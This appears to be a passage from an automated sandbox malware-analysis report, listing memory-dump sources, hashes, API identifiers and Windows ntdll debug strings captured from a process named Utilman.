                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: 632495f30c337337c159d0127c77271844d8e494d97185bed949f724e2e97438
                                                                                            • Instruction ID: 0ed3a9061b7de3d9566a0059fdb98509a364aab82b7b5440daac1873b6c114c9
                                                                                            • Opcode Fuzzy Hash: 632495f30c337337c159d0127c77271844d8e494d97185bed949f724e2e97438
                                                                                            • Instruction Fuzzy Hash: 7351E7B9A04645BEDF38DF5CC8909BFB7FAEB44200B448859E4A6D7641D7B4EE40C760
                                                                                            Strings
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05154787
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05154725
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05154742
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05154655
                                                                                            • Execute=1, xrefs: 05154713
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051546FC
                                                                                            • ExecuteOptions, xrefs: 051546A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: 5e3e4428739d3bf3107861b87cc661bce25f983f461b1c8d55b45abb76bf60bf
                                                                                            • Instruction ID: f67c0c7ef9bc16386e3f28610d29fd4e39e0afda54f8d7db194730209f1feea8
                                                                                            • Opcode Fuzzy Hash: 5e3e4428739d3bf3107861b87cc661bce25f983f461b1c8d55b45abb76bf60bf
                                                                                            • Instruction Fuzzy Hash: 3651F931B00219BAEF21EB64EC99FAD77A9FF05310F0400E9E905AB2C1EB709A55CF54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$[$]:%u
                                                                                            • API String ID: 48624451-2819853543
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051502BD
                                                                                            • RTL: Re-Waiting, xrefs: 0515031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051502E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            Strings
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05157B7F
                                                                                            • RTL: Re-Waiting, xrefs: 05157BAC
                                                                                            • RTL: Resource at %p, xrefs: 05157B8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0515728C
                                                                                            Strings
                                                                                            • RTL: Re-Waiting, xrefs: 051572C1
                                                                                            • RTL: Resource at %p, xrefs: 051572A3
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05157294
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$]:%u
                                                                                            • API String ID: 48624451-3050659472
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 95qp$g$p95w$ro|e$syta
                                                                                            • API String ID: 0-3214567825
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            APIs
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0516CFBD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8
                                                                                            • String ID: @$@4Cw@4Cw
                                                                                            • API String ID: 4062629308-3101775584